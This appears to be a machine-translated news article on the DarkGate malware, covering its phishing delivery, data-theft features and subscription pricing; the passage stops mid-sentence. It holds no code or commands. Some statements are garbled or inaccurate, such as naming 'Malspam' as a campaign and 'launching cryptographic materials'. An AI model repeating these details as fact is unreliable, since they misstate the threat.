Malware DarkGate Spreads via Phishing Mails

Security researchers have uncovered a new malware campaign known as Malspam, during which victims are being infected with a malicious software called DarkGate.

Telekom Security experts speculate that the sudden increase in DarkGate activity may be due to the fact that the developer of this malicious software has started leasing it to a limited group of affiliated individuals.

In a detailed report by the company, the attack is said to initiate through a phishing link, which redirects the victim to a malicious MSI file via a traffic redirect system. The download and execution of this file initiates a multi-stage process that eventually results in the decoding and launch of DarkGate (source).

Researchers have also noticed an alternative method of attack, where a Visual Basic script is used instead of an MSI file. This script utilizes Curl to extract the executable Autoit file and the script itself. However, the exact method by which the VB-script is delivered to the system is currently unknown.

DarkGate, which is sold on underground forums by a hacker known as “Rastafareye”, has the ability to evade antivirus programs and make system modifications through changes in the register. It is also capable of stealing data from browsers and programs such as Discord and Filezilla.

The malicious software establishes a connection with a command server for various malicious activities, including file theft, launching cryptographic materials, remote screenshot creation, and executing other commands. Earlier versions of DarkGate also included a modular component.

DarkGate is available for subscription ranging from $1,000 per day to $100,000 per year. The developer markets it as the “ultimate tool for penetration testers,” but it is widely recognized as an illegitimate pentesting tool.

Fishing attacks remain the primary method for distributing bootloaders and other malware, including Krakenkeylogger, QAKBOT, RACCOON STEALER, and more. According to a recent report by HP Wolf Security, email-based attacks accounted for

/Reports, release notes, official announcements.